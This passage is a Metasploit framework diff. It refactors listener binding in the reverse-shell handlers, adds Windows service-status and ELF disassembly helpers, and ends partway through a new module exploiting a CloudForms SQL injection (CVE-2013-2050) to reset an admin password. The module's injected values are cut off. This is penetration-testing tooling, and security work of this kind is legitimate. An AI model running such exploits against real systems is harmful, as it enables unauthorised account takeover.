#
|
#
|
||||||
|
@ -163,6 +150,7 @@ module ReverseHttp
|
||||||
OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
|
OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
|
||||||
OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
|
OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
|
||||||
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
||||||
|
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
|
||||||
OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ])
|
OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ])
|
||||||
], Msf::Handler::ReverseHttp)
|
], Msf::Handler::ReverseHttp)
|
||||||
end
|
end
|
||||||
|
@ -186,17 +174,13 @@ module ReverseHttp
|
||||||
comm = nil
|
comm = nil
|
||||||
end
|
end
|
||||||
|
|
||||||
# Determine where to bind the HTTP(S) server to
|
local_port = bind_port
|
||||||
bindaddrs = ipv6 ? '::' : '0.0.0.0'
|
addrs = bind_address
|
||||||
|
|
||||||
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
|
||||||
bindaddrs = datastore['ReverseListenerBindAddress']
|
|
||||||
end
|
|
||||||
|
|
||||||
# Start the HTTPS server service on this host/port
|
# Start the HTTPS server service on this host/port
|
||||||
self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
|
self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
|
||||||
datastore['LPORT'].to_i,
|
local_port,
|
||||||
bindaddrs,
|
addrs[0],
|
||||||
ssl?,
|
ssl?,
|
||||||
{
|
{
|
||||||
'Msf' => framework,
|
'Msf' => framework,
|
||||||
|
@ -413,6 +397,33 @@ protected
|
||||||
obj.service.close_client( cli )
|
obj.service.close_client( cli )
|
||||||
end
|
end
|
||||||
|
|
||||||
|
protected
|
||||||
|
|
||||||
|
def bind_port
|
||||||
|
port = datastore['ReverseListenerBindPort'].to_i
|
||||||
|
port > 0 ? port : datastore['LPORT'].to_i
|
||||||
|
end
|
||||||
|
|
||||||
|
def bind_address
|
||||||
|
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
||||||
|
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
||||||
|
# First attempt to bind LHOST. If that fails, the user probably has
|
||||||
|
# something else listening on that interface. Try again with ANY_ADDR.
|
||||||
|
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
||||||
|
|
||||||
|
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
||||||
|
|
||||||
|
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||||
|
# Only try to bind to this specific interface
|
||||||
|
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
||||||
|
|
||||||
|
# Pick the right "any" address if either wildcard is used
|
||||||
|
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
||||||
|
end
|
||||||
|
|
||||||
|
addrs
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -42,13 +42,17 @@ module ReverseHttpsProxy
|
||||||
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
|
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
|
||||||
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
|
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
|
||||||
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
|
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
|
||||||
OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
|
|
||||||
OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
|
|
||||||
OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
|
OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
|
||||||
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
|
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
|
||||||
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
|
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
|
||||||
], Msf::Handler::ReverseHttpsProxy)
|
], Msf::Handler::ReverseHttpsProxy)
|
||||||
|
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
||||||
|
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
|
||||||
|
], Msf::Handler::ReverseHttpsProxy)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -53,8 +53,9 @@ module ReverseTcp
|
||||||
[
|
[
|
||||||
OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]),
|
OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]),
|
||||||
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
||||||
|
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
|
||||||
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
|
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
|
||||||
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
|
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false])
|
||||||
], Msf::Handler::ReverseTcp)
|
], Msf::Handler::ReverseTcp)
|
||||||
|
|
||||||
|
|
||||||
|
@ -72,13 +73,6 @@ module ReverseTcp
|
||||||
end
|
end
|
||||||
|
|
||||||
ex = false
|
ex = false
|
||||||
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
|
||||||
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
|
||||||
# First attempt to bind LHOST. If that fails, the user probably has
|
|
||||||
# something else listening on that interface. Try again with ANY_ADDR.
|
|
||||||
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
|
||||||
|
|
||||||
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
|
||||||
|
|
||||||
comm = datastore['ReverseListenerComm']
|
comm = datastore['ReverseListenerComm']
|
||||||
if comm.to_s == "local"
|
if comm.to_s == "local"
|
||||||
|
@ -87,19 +81,15 @@ module ReverseTcp
|
||||||
comm = nil
|
comm = nil
|
||||||
end
|
end
|
||||||
|
|
||||||
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
local_port = bind_port
|
||||||
# Only try to bind to this specific interface
|
addrs = bind_address
|
||||||
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
|
||||||
|
|
||||||
# Pick the right "any" address if either wildcard is used
|
|
||||||
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
|
||||||
end
|
|
||||||
addrs.each { |ip|
|
addrs.each { |ip|
|
||||||
begin
|
begin
|
||||||
|
|
||||||
self.listener_sock = Rex::Socket::TcpServer.create(
|
self.listener_sock = Rex::Socket::TcpServer.create(
|
||||||
'LocalHost' => ip,
|
'LocalHost' => ip,
|
||||||
'LocalPort' => datastore['LPORT'].to_i,
|
'LocalPort' => local_port,
|
||||||
'Comm' => comm,
|
'Comm' => comm,
|
||||||
'Context' =>
|
'Context' =>
|
||||||
{
|
{
|
||||||
|
@ -119,11 +109,11 @@ module ReverseTcp
|
||||||
via = ""
|
via = ""
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Started reverse handler on #{ip}:#{datastore['LPORT']} #{via}")
|
print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
|
||||||
break
|
break
|
||||||
rescue
|
rescue
|
||||||
ex = $!
|
ex = $!
|
||||||
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
|
print_error("Handler failed to bind to #{ip}:#{local_port}")
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
raise ex if (ex)
|
raise ex if (ex)
|
||||||
|
@ -140,7 +130,8 @@ module ReverseTcp
|
||||||
# Starts monitoring for an inbound connection.
|
# Starts monitoring for an inbound connection.
|
||||||
#
|
#
|
||||||
def start_handler
|
def start_handler
|
||||||
self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{datastore['LPORT']}", false) {
|
local_port = bind_port
|
||||||
|
self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{local_port}", false) {
|
||||||
client = nil
|
client = nil
|
||||||
|
|
||||||
begin
|
begin
|
||||||
|
@ -159,7 +150,7 @@ module ReverseTcp
|
||||||
end while true
|
end while true
|
||||||
}
|
}
|
||||||
|
|
||||||
self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{datastore['LPORT']}", false) {
|
self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{local_port}", false) {
|
||||||
while true
|
while true
|
||||||
client = self.handler_queue.pop
|
client = self.handler_queue.pop
|
||||||
begin
|
begin
|
||||||
|
@ -241,6 +232,31 @@ module ReverseTcp
|
||||||
|
|
||||||
protected
|
protected
|
||||||
|
|
||||||
|
def bind_port
|
||||||
|
port = datastore['ReverseListenerBindPort'].to_i
|
||||||
|
port > 0 ? port : datastore['LPORT'].to_i
|
||||||
|
end
|
||||||
|
|
||||||
|
def bind_address
|
||||||
|
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
||||||
|
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
||||||
|
# First attempt to bind LHOST. If that fails, the user probably has
|
||||||
|
# something else listening on that interface. Try again with ANY_ADDR.
|
||||||
|
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
||||||
|
|
||||||
|
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
||||||
|
|
||||||
|
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||||
|
# Only try to bind to this specific interface
|
||||||
|
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
||||||
|
|
||||||
|
# Pick the right "any" address if either wildcard is used
|
||||||
|
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
||||||
|
end
|
||||||
|
|
||||||
|
addrs
|
||||||
|
end
|
||||||
|
|
||||||
attr_accessor :listener_sock # :nodoc:
|
attr_accessor :listener_sock # :nodoc:
|
||||||
attr_accessor :listener_thread # :nodoc:
|
attr_accessor :listener_thread # :nodoc:
|
||||||
attr_accessor :handler_thread # :nodoc:
|
attr_accessor :handler_thread # :nodoc:
|
||||||
|
|
|
@ -43,7 +43,9 @@ module ReverseTcpSsl
|
||||||
super
|
super
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
|
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']),
|
||||||
|
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
|
||||||
|
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
|
||||||
], Msf::Handler::ReverseTcpSsl)
|
], Msf::Handler::ReverseTcpSsl)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
@ -59,13 +61,6 @@ module ReverseTcpSsl
|
||||||
end
|
end
|
||||||
|
|
||||||
ex = false
|
ex = false
|
||||||
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
|
||||||
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
|
||||||
# First attempt to bind LHOST. If that fails, the user probably has
|
|
||||||
# something else listening on that interface. Try again with ANY_ADDR.
|
|
||||||
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
|
||||||
|
|
||||||
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
|
||||||
|
|
||||||
comm = datastore['ReverseListenerComm']
|
comm = datastore['ReverseListenerComm']
|
||||||
if comm.to_s == "local"
|
if comm.to_s == "local"
|
||||||
|
@ -74,20 +69,16 @@ module ReverseTcpSsl
|
||||||
comm = nil
|
comm = nil
|
||||||
end
|
end
|
||||||
|
|
||||||
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
local_port = bind_port
|
||||||
# Only try to bind to this specific interface
|
addrs = bind_address
|
||||||
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
|
||||||
|
|
||||||
# Pick the right "any" address if either wildcard is used
|
|
||||||
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
|
||||||
end
|
|
||||||
addrs.each { |ip|
|
addrs.each { |ip|
|
||||||
begin
|
begin
|
||||||
|
|
||||||
comm.extend(Rex::Socket::SslTcp)
|
comm.extend(Rex::Socket::SslTcp)
|
||||||
self.listener_sock = Rex::Socket::SslTcpServer.create(
|
self.listener_sock = Rex::Socket::SslTcpServer.create(
|
||||||
'LocalHost' => datastore['LHOST'],
|
'LocalHost' => ip,
|
||||||
'LocalPort' => datastore['LPORT'].to_i,
|
'LocalPort' => local_port,
|
||||||
'Comm' => comm,
|
'Comm' => comm,
|
||||||
'SSLCert' => datastore['SSLCert'],
|
'SSLCert' => datastore['SSLCert'],
|
||||||
'Context' =>
|
'Context' =>
|
||||||
|
@ -108,16 +99,43 @@ module ReverseTcpSsl
|
||||||
via = ""
|
via = ""
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
|
print_status("Started reverse SSL handler on #{ip}:#{local_port} #{via}")
|
||||||
break
|
break
|
||||||
rescue
|
rescue
|
||||||
ex = $!
|
ex = $!
|
||||||
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
|
print_error("Handler failed to bind to #{ip}:#{local_port}")
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
raise ex if (ex)
|
raise ex if (ex)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
protected
|
||||||
|
|
||||||
|
def bind_port
|
||||||
|
port = datastore['ReverseListenerBindPort'].to_i
|
||||||
|
port > 0 ? port : datastore['LPORT'].to_i
|
||||||
|
end
|
||||||
|
|
||||||
|
def bind_address
|
||||||
|
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
||||||
|
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
||||||
|
# First attempt to bind LHOST. If that fails, the user probably has
|
||||||
|
# something else listening on that interface. Try again with ANY_ADDR.
|
||||||
|
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
||||||
|
|
||||||
|
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
||||||
|
|
||||||
|
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||||
|
# Only try to bind to this specific interface
|
||||||
|
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
||||||
|
|
||||||
|
# Pick the right "any" address if either wildcard is used
|
||||||
|
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
||||||
|
end
|
||||||
|
|
||||||
|
addrs
|
||||||
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -449,6 +449,9 @@ class Module
|
||||||
ch = self.compat['Nop']
|
ch = self.compat['Nop']
|
||||||
elsif (mod.type == MODULE_PAYLOAD)
|
elsif (mod.type == MODULE_PAYLOAD)
|
||||||
ch = self.compat['Payload']
|
ch = self.compat['Payload']
|
||||||
|
if self.respond_to?("target") and self.target['Payload'] and self.target['Payload']['Compat']
|
||||||
|
ch = ch.merge(self.target['Payload']['Compat'])
|
||||||
|
end
|
||||||
else
|
else
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,5 +1,6 @@
|
||||||
|
|
||||||
module Msf::Post::Windows
|
module Msf::Post::Windows
|
||||||
|
require 'msf/core/post/windows/error'
|
||||||
require 'msf/core/post/windows/accounts'
|
require 'msf/core/post/windows/accounts'
|
||||||
require 'msf/core/post/windows/cli_parse'
|
require 'msf/core/post/windows/cli_parse'
|
||||||
require 'msf/core/post/windows/eventlog'
|
require 'msf/core/post/windows/eventlog'
|
||||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -306,6 +306,50 @@ module Services
|
||||||
handle["GetLastError"]
|
handle["GetLastError"]
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Query Service Status
|
||||||
|
#
|
||||||
|
# @param (see #service_start)
|
||||||
|
#
|
||||||
|
# @return {} representing lpServiceStatus
|
||||||
|
#
|
||||||
|
# @raise (see #service_start)
|
||||||
|
#
|
||||||
|
#
|
||||||
|
def service_status(name, server=nil)
|
||||||
|
adv = session.railgun.advapi32
|
||||||
|
ret = nil
|
||||||
|
|
||||||
|
# 0x80000000 GENERIC_READ
|
||||||
|
open_sc_manager(:host => server, :access => 0x80000000) do |manager|
|
||||||
|
# Now to grab a handle to the service.
|
||||||
|
handle = adv.OpenServiceA(manager, name, 0x80000000)
|
||||||
|
if (handle["return"] == 0)
|
||||||
|
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
|
||||||
|
end
|
||||||
|
|
||||||
|
status = adv.QueryServiceStatus(handle["return"],28)
|
||||||
|
if (status["return"] == 0)
|
||||||
|
raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{handle["GetLastError"]}")
|
||||||
|
end
|
||||||
|
|
||||||
|
vals = status['lpServiceStatus'].unpack('L*')
|
||||||
|
adv.CloseServiceHandle(handle["return"])
|
||||||
|
|
||||||
|
ret = {
|
||||||
|
:type => vals[0],
|
||||||
|
:state => vals[1],
|
||||||
|
:controls_accepted => vals[2],
|
||||||
|
:win32_exit_code => vals[3],
|
||||||
|
:service_exit_code => vals[4],
|
||||||
|
:check_point => vals[5],
|
||||||
|
:wait_hint => vals[6]
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
return ret
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -1040,6 +1040,7 @@ def self.to_vba(framework,code,opts={})
|
||||||
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
|
||||||
# Specify the payload in hex as an extra file..
|
# Specify the payload in hex as an extra file..
|
||||||
payload_hex = exe.unpack('H*')[0]
|
payload_hex = exe.unpack('H*')[0]
|
||||||
|
|
|
@ -1,4 +1,5 @@
|
||||||
# -*- coding: binary -*-
|
# -*- coding: binary -*-
|
||||||
|
require 'metasm'
|
||||||
|
|
||||||
module Rex
|
module Rex
|
||||||
module ElfScan
|
module ElfScan
|
||||||
|
@ -27,6 +28,26 @@ class Generic
|
||||||
rva = hit[0]
|
rva = hit[0]
|
||||||
message = hit[1].is_a?(Array) ? hit[1].join(" ") : hit[1]
|
message = hit[1].is_a?(Array) ? hit[1].join(" ") : hit[1]
|
||||||
$stdout.puts elf.ptr_s(rva) + " " + message
|
$stdout.puts elf.ptr_s(rva) + " " + message
|
||||||
|
if(param['disasm'])
|
||||||
|
message.gsub!("; ", "\n")
|
||||||
|
if message.include?("retn")
|
||||||
|
message.gsub!("retn", "ret")
|
||||||
|
end
|
||||||
|
|
||||||
|
begin
|
||||||
|
d2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, message).disassemble
|
||||||
|
rescue Metasm::ParseError
|
||||||
|
d2 = Metasm::Shellcode.disassemble(Metasm::Ia32.new, [message].pack('H*'))
|
||||||
|
end
|
||||||
|
|
||||||
|
addr = 0
|
||||||
|
while ((di = d2.disassemble_instruction(addr)))
|
||||||
|
disasm = "0x%08x\t" % (rva + addr)
|
||||||
|
disasm << di.instruction.to_s
|
||||||
|
$stdout.puts disasm
|
||||||
|
addr = di.next_addr
|
||||||
|
end
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -203,4 +224,3 @@ end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -27,6 +27,10 @@ class Def_advapi32
|
||||||
def self.create_dll(dll_path = 'advapi32')
|
def self.create_dll(dll_path = 'advapi32')
|
||||||
dll = DLL.new(dll_path, ApiConstants.manager)
|
dll = DLL.new(dll_path, ApiConstants.manager)
|
||||||
|
|
||||||
|
dll.add_function('QueryServiceStatus', 'DWORD', [
|
||||||
|
['LPVOID', 'hService', 'in'],
|
||||||
|
['PBLOB', 'lpServiceStatus', 'out']])
|
||||||
|
|
||||||
dll.add_function('CredEnumerateA', 'BOOL', [
|
dll.add_function('CredEnumerateA', 'BOOL', [
|
||||||
['PCHAR', 'Filter', 'in'],
|
['PCHAR', 'Filter', 'in'],
|
||||||
['DWORD', 'Flags', 'in'],
|
['DWORD', 'Flags', 'in'],
|
||||||
|
@ -2089,10 +2093,8 @@ class Def_advapi32
|
||||||
["PBLOB","pvContext","in"],
|
["PBLOB","pvContext","in"],
|
||||||
])
|
])
|
||||||
|
|
||||||
|
|
||||||
return dll
|
return dll
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end; end; end; end; end; end; end
|
end; end; end; end; end; end; end
|
||||||
|
|
|
@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
</SOAP-ENV:Body>
|
</SOAP-ENV:Body>
|
||||||
</SOAP-ENV:Envelope>|
|
</SOAP-ENV:Envelope>|
|
||||||
|
|
||||||
template = template.gsub(/^\t\t/, '')
|
template = template.gsub(/^ {4}/, '')
|
||||||
template = template.gsub(/\n/, '')
|
template = template.gsub(/\n/, '')
|
||||||
|
|
||||||
connect
|
connect
|
||||||
|
|
|
@ -0,0 +1,175 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'bcrypt'
|
||||||
|
require 'digest'
|
||||||
|
require 'openssl'
|
||||||
|
|
||||||
|
class Metasploit4 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a SQL injection vulnerability in the "explorer"
|
||||||
|
action of "miq_policy" controller of the Red Hat CloudForms Management
|
||||||
|
Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by
|
||||||
|
changing the password of the target account to the specified password.
|
||||||
|
},
|
||||||
|
'Author' => 'Ramon de C Valle',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2013-2050'],
|
||||||
|
['CWE', '89'],
|
||||||
|
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=959062']
|
||||||
|
],
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'SSL' => true
|
||||||
|
},
|
||||||
|
'DisclosureDate' => 'Nov 12 2013'
|
||||||
|
)
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(443),
|
||||||
|
OptString.new('USERNAME', [true, 'Your username']),
|
||||||
|
OptString.new('PASSWORD', [true, 'Your password']),
|
||||||
|
OptString.new('TARGETUSERNAME', [true, 'The username of the target account', 'admin']),
|
||||||
|
OptString.new('TARGETPASSWORD', [true, 'The password of the target account', 'smartvm']),
|
||||||
|
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
|
||||||
|
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])
|
||||||
|
], self.class
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
def password_for_newer_schema
|
||||||
|
# Newer versions use ActiveModel's SecurePassword.
|
||||||
|
BCrypt::Password.create(datastore['TARGETPASSWORD'])
|
||||||
|
end
|
||||||
|
|
||||||
|
def password_for_older_schema
|
||||||
|
# Older versions use ManageIQ's MiqPassword.
|
||||||
|
if datastore['TARGETPASSWORD'].empty?
|
||||||
|
'v1:{}'
|
||||||
|
else
|
||||||
|
password = '1234567890123456'
|
||||||
|
salt = '6543210987654321'
|
||||||
|
cipher = OpenSSL::Cipher.new('AES-256-CBC')
|
||||||
|
cipher.encrypt
|
||||||
|
cipher.key = Digest::SHA256.digest("#{salt}#{password}")[0...32]
|
||||||
|
encrypted = cipher.update(datastore['TARGETPASSWORD']) + cipher.final
|
||||||
|
"v1:{#{Rex::Text.encode_base64(encrypted)}}"
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def password_reset?
|
||||||
|
print_status("Trying to log into #{target_url('dashboard')} using the target account...")
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
|
||||||
|
'vars_post' => {
|
||||||
|
'user_name' => datastore['TARGETUSERNAME'],
|
||||||
|
'user_password' => datastore['TARGETPASSWORD']
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
if res.nil?
|
||||||
|
print_error('No response from remote host')
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.body =~ /"Error: (.*)"/
|
||||||
|
print_error($1)
|
||||||
|
false
|
||||||
|
else
|
||||||
|
true
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
print_status("Logging into #{target_url('dashboard')}...")
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
|
||||||
|
'vars_post' => {
|
||||||
|
'user_name' => datastore['USERNAME'],
|
||||||
|
'user_password' => datastore['PASSWORD']
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
if res.nil?
|
||||||
|
print_error('No response from remote host')
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.body =~ /"Error: (.*)"/
|
||||||
|
print_error($1)
|
||||||
|
return
|
||||||
|
else
|
||||||
|
session = $1 if res.headers['Set-Cookie'] =~ /_vmdb_session=(\h*)/
|
||||||
|
|
||||||
|
if session.nil?
|
||||||
|
print_error('Failed to retrieve the current session id')
|
||||||
|
return
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# Newer versions don't accept POST requests.
|
||||||
|
print_status("Sending password-reset request to #{target_url('miq_policy', 'explorer')}...")
|
||||||
|
send_request_cgi(
|
||||||
|
'cookie' => "_vmdb_session=#{session}",
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
|
||||||
|
'vars_get' => {
|
||||||
|
'profile[]' => value_for_newer_schema
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
if password_reset?
|
||||||
|
print_good('Password reset successfully')
|
||||||
|
return
|
||||||
|
else
|
||||||
|
print_error('Failed to reset password')
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Sending (older-schema) password-reset request to #{target_url('miq_policy', 'explorer')}...")
|
||||||
|
send_request_cgi(
|
||||||
|
'cookie' => "_vmdb_session=#{session}",
|
||||||
|
'method' => datastore['HTTP_METHOD'],
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
|
||||||
|
"vars_#{datastore['HTTP_METHOD'].downcase}" => {
|
||||||
|
'profile[]' => value_for_older_schema
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
if password_reset?
|
||||||
|
print_good('Password reset successfully')
|
||||||
|
else
|
||||||
|
print_error('Failed to reset password')
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def target_url(*args)
|
||||||
|
(ssl ? 'https' : 'http') +
|
||||||
|
if rport.to_i == 80 || rport.to_i == 443
|
||||||
|
"://#{vhost}"
|
||||||
|
else
|
||||||
|
"://#{vhost}:#{rport}"
|
||||||
|
end + normalize_uri(target_uri.path, *args)
|
||||||
|
end
|
||||||
|
|
||||||
